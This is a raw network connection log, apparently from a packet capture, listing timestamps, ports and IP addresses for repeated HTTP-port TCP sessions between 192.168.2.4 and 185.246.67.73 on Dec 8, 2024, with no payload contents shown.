Dec 8, 2024 15:27:27.519159079 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.523191929 CET | 80 | 49747 | 185.246.67.73 | 192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.560230970 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.560381889 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.638531923 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.638540983 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.679719925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.679799080 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.720185995 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.840265036 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.840344906 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.935864925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.936002970 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.959625006 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055501938 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055516005 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055571079 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055579901 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055660963 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055669069 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055742979 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055792093 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055839062 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055908918 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055951118 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055973053 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056050062 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056291103 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056299925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056421995 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056504965 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056581974 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056651115 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056752920 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056761026 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056853056 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.057018042 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.057197094 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.261780977 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.309932947 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.380140066 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.434921980 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.612236023 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.747561932 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.822221041 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.842046976 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.932205915 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.941884041 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.941962004 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.961355925 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.961416960 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.961730957 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.048115969 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.080945969 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.310036898 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.429550886 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.429562092 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.429569960 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.984031916 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.984481096 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104429007 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.104497910 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.104516029 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104617119 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104636908 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.223833084 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.290189028 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.450773954 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.513072014 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.538415909 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.570185900 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.570198059 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.656686068 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.796426058 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.800362110 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.916338921 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.916387081 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.919996023 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.920053959 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.922065020 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.041544914 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.299752951 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.419714928 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.419737101 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.419745922 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.437135935 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.544284105 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.676366091 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.747423887 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.238776922 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.450548887 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.472199917 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.588093042 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.588152885 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.588416100 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708616018 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.708677053 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.708678007 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708755016 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708889961 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.709120989 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.709187031 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.829425097 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.060019970 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:33.179615974 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.179626942 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.179635048 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.033162117 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.075567007 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.269157887 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.309921980 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.390422106 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.509952068 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.510031939 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.510154009 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.629391909 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.856924057 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.976455927 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.976469040 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.976478100 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:35.831799030 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:35.872461081 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.064136028 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.106811047 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.181247950 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.181551933 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301233053 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.301326990 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301444054 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301532030 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.302261114 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.421256065 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.656260014 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.688575029 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.688577890 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.775778055 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.775788069 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.775809050 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.807945013 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.808085918 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.808207989 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.848170996 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.868927956 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.934050083 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.991997004 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.992054939 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.992156982 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.113848925 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.153835058 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.273298979 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.273308992 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.317292929 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.317373991 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.341309071 CET4975580192.168.2.4185.246.67.73
Timestamp                           Src Port  Dst Port  Source IP      Dest IP
Dec 8, 2024 15:27:37.460750103 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:37.460761070 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:37.460768938 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.154244900 CET  80        49754     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.200575113 CET  49754     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.312613964 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.358233929 CET  49755     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.392328978 CET  80        49754     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.434979916 CET  49754     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.552542925 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.606862068 CET  49755     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.663780928 CET  49754     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.663911104 CET  49755     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.664132118 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.783564091 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.783675909 CET  80        49754     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.783797979 CET  49754     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.783801079 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.784037113 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.784557104 CET  80        49755     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:38.784687042 CET  49755     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:38.903271914 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:39.056021929 CET  80        49751     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:39.056090117 CET  49751     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:39.138390064 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:39.258785963 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:39.258797884 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:39.258891106 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:40.115076065 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:40.169348001 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:40.348371029 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:40.406296968 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:40.498605013 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:40.617945910 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:40.618063927 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:40.618238926 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:40.737514019 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:40.966372013 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:41.085884094 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:41.085896015 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:41.085925102 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:41.938554049 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:41.984256983 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.180918932 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.231839895 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.313731909 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.313941002 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.433202982 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.433336973 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.433418036 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.433681965 CET  80        49757     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.433746099 CET  49757     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.552680969 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.778847933 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:42.898639917 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.898665905 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:42.898680925 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.405488014 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.405714989 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.525314093 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.525373936 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.525492907 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.525842905 CET  80        49758     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.525892019 CET  49758     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.541476965 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.644921064 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.661624908 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.661683083 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.661802053 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.781122923 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.872566938 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:43.994477034 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:43.994518995 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:44.013179064 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:44.133511066 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:44.133543968 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:44.133574963 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:44.864912987 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:44.919349909 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:44.988032103 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.028722048 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.100759983 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.153747082 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.224329948 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.261821985 CET  80        49756     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.261899948 CET  49756     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.278753042 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.336155891 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.336417913 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.336424112 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.455760002 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.455826998 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.455923080 CET  80        49759     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.455959082 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.456011057 CET  49759     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.456481934 CET  80        49760     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.456530094 CET  49760     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.575206995 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.810146093 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:45.929527044 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.929541111 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:45.929559946 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:46.871999979 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:46.919348001 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.104183912 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:47.153734922 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.228249073 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.348031998 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:47.348099947 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.348248005 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.467865944 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:47.700836897 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:47.820350885 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:47.820426941 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:47.820498943 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:48.672621965 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:48.716341019 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:48.912297010 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:48.966245890 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.024594069 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.024878025 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.144382954 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:49.144495964 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.144524097 CET  80        49762     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:49.144603014 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.144623995 CET  49762     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.264956951 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:49.497684956 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:49.617566109 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:49.617578030 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:49.617652893 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.107650042 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.107706070 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.227216959 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.227276087 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.227385044 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.227576971 CET  80        49763     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.227631092 CET  49763     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.228408098 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.346777916 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.347910881 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.347995996 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.348189116 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.472398043 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.576031923 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.695512056 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.695600033 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.700922012 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:50.820424080 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.820450068 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:50.820492983 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.552993059 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.606956005 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:51.685236931 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.731897116 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:51.788412094 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.841324091 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:51.894381046 CET  80        49761     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.894570112 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:51.920366049 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:51.966242075 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.040384054 CET  49761     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.040504932 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.040508032 CET  49764     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.040792942 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.160079956 CET  80        49766     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.160165071 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.160321951 CET  49766     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.160731077 CET  80        49765     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.160773039 CET  80        49764     185.246.67.73  192.168.2.4
Dec 8, 2024 15:27:52.160789967 CET  49765     80        192.168.2.4    185.246.67.73
Dec 8, 2024 15:27:52.160809040 CET  49764     80        192.168.2.4    185.246.67.73
